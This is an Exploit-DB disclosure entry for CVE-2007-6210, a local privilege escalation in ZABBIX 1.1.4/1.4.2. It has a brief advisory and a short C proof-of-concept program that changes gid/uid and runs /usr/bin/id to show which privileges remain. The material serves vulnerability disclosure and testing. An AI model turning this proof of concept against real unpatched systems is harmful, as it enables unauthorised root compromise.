ZABBIX 1.1.4/1.4.2 - daemon_start Local Privilege Escalation Vulnerability

2007-12-03T00:00:00
ID EDB-ID:30839
Type exploitdb
Reporter Bas van Schaik
Modified 2007-12-03T00:00:00

Description

ZABBIX 1.1.4/1.4.2 daemon_start Local Privilege Escalation Vulnerability. CVE-2007-6210. Local exploit for linux platform

                                        
                                            source: http://www.securityfocus.com/bid/26680/info

ZABBIX is prone to a local privilege-escalation vulnerability.

An attacker can exploit this issue to execute commands with superuser privileges. Successfully exploiting this issue will result in the complete compromise of affected computers.

This issue affects ZABBIX 1.4.2; prior versions may also be affected. 

 #include <sys/types.h>
 #include <unistd.h>
 #include <pwd.h>
 #include <stdio.h>
 
int main() 
{
         struct passwd *pw;
         pw = getpwnam("abi");
         FILE *pipe;
         char buf[25];
         setgid(pw->pw_gid);
         setuid(pw->pw_uid);
 
         printf("my gid: %d\n", getegid());
         printf("my uid: %d\n", getuid());
 
         pipe = popen("/usr/bin/id", "r");
         while (fgets(buf, sizeof buf, pipe)) {
                 printf("%s", buf);
         }
         printf("\n");
         pclose(pipe);
 }